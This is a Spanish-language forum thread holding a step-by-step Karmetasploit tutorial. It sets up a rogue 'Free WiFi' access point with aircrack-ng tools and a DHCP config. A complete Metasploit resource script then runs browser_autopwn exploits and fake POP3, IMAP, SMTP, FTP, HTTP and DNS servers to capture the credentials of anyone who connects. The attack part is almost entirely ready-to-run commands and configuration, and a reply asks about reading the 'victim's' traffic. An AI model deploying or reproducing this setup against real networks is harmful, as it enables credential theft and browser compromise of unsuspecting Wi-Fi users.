Results 1 to 2 of 2

Thread: Karmetasploit

  1. #1
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    17

    Post Karmetasploit

    Karmetasploit es la union de Karma y Metasploit. De tal forma tiene un AP malvado que acepta todas las conexiones y después tienes al poderoso Metasplot.

    Primero debes actualizar tu sistema con apt-get update && apt-get updgrade.

    Luego asegurate que puedes inyectar:

    airmon-ng start [wifi-interface]

    Ejemplo: airmon-ng start wlan0
    Code:

    aireplay-ng --test [monitor-interface]

    Ejemplo: aireplay-ng --test mon0

    Solo si tienes valores de 0%, deberías revisar tu tarjeta para que funcione la inyección de datos. Luego configura el servicio dhcp:

    mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bak

    Y escribe un nuevo dhcpd.conf:

    nano /etc/dhcp3/dhcpd.conf


    Escribe en lo siguiente:

    option domain-name-servers 10.0.0.1;

    default-lease-time 60;
    max-lease-time 72;

    ddns-update-style none;

    authoritative;

    log-facility local7;

    subnet 10.0.0.0 netmask 255.255.255.0 {
    range 10.0.0.100 10.0.0.254;
    option routers 10.0.0.1;
    option domain-name-servers 10.0.0.1;
    }



    El próximo paso es configurar un acceso WIFI “Gratuito”:

    airbase-ng -P -C 30 -e "Free WiFi" -v [monitor-interface]



    ... luego configurar la interfaz...

    ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

    ... configura dhcp para la interfaz at0

    dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0


    Puedes ignorar el error. Después puedes poner un archivo, digamos que a /root:

    nano /root/karma.rc

    Con el siguiente contenido:

    load db_sqlite3
    db_create /root/karma.db

    use auxiliary/server/browser_autopwn

    setg AUTOPWN_HOST 10.0.0.1
    setg AUTOPWN_PORT 55550
    setg AUTOPWN_URI /ads

    set LHOST 10.0.0.1
    set LPORT 45000
    set SRVPORT 55550
    set URIPATH /ads

    run

    use auxiliary/server/capture/pop3
    set SRVPORT 110
    set SSL false
    run

    use auxiliary/server/capture/pop3
    set SRVPORT 995
    set SSL true
    run

    use auxiliary/server/capture/ftp
    run

    use auxiliary/server/capture/imap
    set SSL false
    set SRVPORT 143
    run

    use auxiliary/server/capture/imap
    set SSL true
    set SRVPORT 993
    run

    use auxiliary/server/capture/smtp
    set SSL false
    set SRVPORT 25
    run

    use auxiliary/server/capture/smtp
    set SSL true
    set SRVPORT 465
    run

    use auxiliary/server/fakedns
    unset TARGETHOST
    set SRVPORT 5353
    run

    use auxiliary/server/fakedns
    unset TARGETHOST
    set SRVPORT 53
    run

    use auxiliary/server/capture/http
    set SRVPORT 80
    set SSL false
    run

    use auxiliary/server/capture/http
    set SRVPORT 8080
    set SSL false
    run

    use auxiliary/server/capture/http
    set SRVPORT 443
    set SSL true
    run

    use auxiliary/server/capture/http
    set SRVPORT 8443
    set SSL true
    run


    Para comenzar el exploit puedes ejecutar

    /pentest/exploits/framework3/msfconsole -r /root/karma.rc

    Tan pronto como alguien (asegurate que seas tu) se conecte, obtendrás algunos mensajes en la pantalla. Cuando apretes enter tendrás la consola de Metasplot, donde puedes tipear db_notes para ver las credenciales capturadas. También puedes usar tcpdump en la interfaz at0 para capturar todo el tráfico.

    Lo interesante es que puedas usar otra máquina para conectarte a el “Wifi” gratuito y luego intenta cargar una página https (desactiva NoScript y agrega una excepción para el certificado!).

  2. #2
    Just burned his ISO Belerofonte's Avatar
    Join Date
    Dec 2009
    Posts
    7

    Default

    Gran aporte!!, me gusta como cargas en la BD los auxiliary, una duda, al enrutar todo el trafico y dar servicios de intertet al host ''Victima''... va en texto plano??

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •